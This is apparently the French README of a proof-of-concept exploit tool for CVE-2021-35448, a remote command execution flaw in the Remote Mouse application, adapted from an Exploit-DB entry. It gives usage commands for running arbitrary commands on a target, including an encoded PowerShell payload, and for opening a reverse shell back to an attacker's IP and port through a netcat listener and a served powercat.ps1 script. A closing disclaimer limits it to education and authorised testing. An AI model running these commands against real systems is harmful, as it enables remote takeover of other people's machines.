
POC pour CVE-2021-35448 basé sur https://www.exploit-db.com/exploits/49601
Cet exploit cible la vulnérabilité CVE-2021-35448 dans l'application Remote Mouse (anciennement WiFi Mouse).
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: Adresse IP cible (obligatoire)-p, --payload: Commande personnalisée à exécuter-r, --reverse: Shell inverse au format IP:PORT-l, --http: Serveur HTTP local au format IP:PORT (obligatoire avec -r)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: Script d'exploitation principalpowercat.ps1: Script PowerShell pour les shells inverses⚠️ UTILISATION ÉTHIQUE UNIQUEMENT ⚠️
Cet outil est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. Toute utilisation non autorisée de cet exploit est illégale et peut entraîner des poursuites judiciaires.
Développé à des fins éducatives et de tests d'intrusion éthiques.
Dernière mise à jour : 2025